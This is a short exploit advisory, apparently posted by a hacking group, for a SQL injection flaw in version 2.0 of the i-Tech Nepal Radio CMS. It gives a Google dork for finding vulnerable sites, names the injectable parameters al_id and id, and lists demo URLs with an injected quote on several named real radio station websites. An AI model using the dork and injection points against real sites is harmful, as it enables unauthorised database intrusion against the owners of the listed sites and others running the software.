######################
# Exploit Title :  i-Tech Nepal Radio CMS SQL Injection Vulnerability 
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.itechnepal.com
# Google Dork : "Powered By : i-Tech Nepal" inurl:php?
# Date: 2016/04/26
# Category:  [ Webapps ]
# Tested on: [Win /php ]
# Version : 2.0
######################
# Vulnerable Input(s):
#                [+] al_id
#                [+] id 
#
# Demo:
# http://www.holyvisionradio.com/photo.php?al_id=6%27
# http://www.choicefm.org/image.php?al_id=7%27
# http://www.bhorukawafm.org/image.php?al_id=15%27
# http://www.radiodidibahini.org/image.php?al_id=1%27
# http://janakpurtoday.com.np/photo.php?id=10
#
######################
# Discovered by :
# Mojtaba MobhaM ([email protected])
# T3NZOG4N ([email protected])
# Greetz : All Persian Hack Team Members
# Homepage : persian-team.ir
###################### 

# siph0n [2016-04-29]